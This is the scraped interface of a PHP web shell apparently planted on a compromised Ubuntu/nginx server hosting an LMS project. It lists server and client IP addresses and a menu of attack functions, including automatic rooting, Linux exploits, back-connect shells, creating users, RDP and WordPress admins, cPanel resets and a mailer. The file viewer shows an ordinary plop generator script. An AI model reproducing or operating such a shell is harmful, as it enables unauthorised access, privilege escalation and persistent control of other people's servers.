Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-client /
internals /
generators /
[ HOME SHELL ]
Name
Size
Permission
Action
component
[ DIR ]
drwxrwxr-x
container
[ DIR ]
drwxrwxr-x
language
[ DIR ]
drwxrwxr-x
utils
[ DIR ]
drwxrwxr-x
index.js
1.7
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
/** * generator/index.js * * Exports the generators so plop knows them */ const fs = require('fs'); const path = require('path'); const { exec } = require('child_process'); const componentGenerator = require('./component/index.js'); const containerGenerator = require('./container/index.js'); const languageGenerator = require('./language/index.js'); /** * Every generated backup file gets this extension * @type {string} */ const BACKUPFILE_EXTENSION = 'rbgen'; module.exports = plop => { plop.setGenerator('component', componentGenerator); plop.setGenerator('container', containerGenerator); plop.setGenerator('language', languageGenerator); plop.addHelper('directory', comp => { try { fs.accessSync( path.join(__dirname, `../../app/containers/${comp}`), fs.F_OK, ); return `containers/${comp}`; } catch (e) { return `components/${comp}`; } }); plop.addHelper('curly', (object, open) => (open ? '{' : '}')); plop.setActionType('prettify', (answers, config) => { const folderPath = `${path.join( __dirname, '/../../app/', config.path, plop.getHelper('properCase')(answers.name), '**.ts*', )}`; exec(`npm run prettify -- "${folderPath}"`); return folderPath; }); plop.setActionType('backup', (answers, config) => { fs.copyFileSync( path.join(__dirname, config.path, config.file), path.join( __dirname, config.path, `${config.file}.${BACKUPFILE_EXTENSION}`, ), 'utf8', ); return path.join( __dirname, config.path, `${config.file}.${BACKUPFILE_EXTENSION}`, ); }); }; module.exports.BACKUPFILE_EXTENSION = BACKUPFILE_EXTENSION;
Close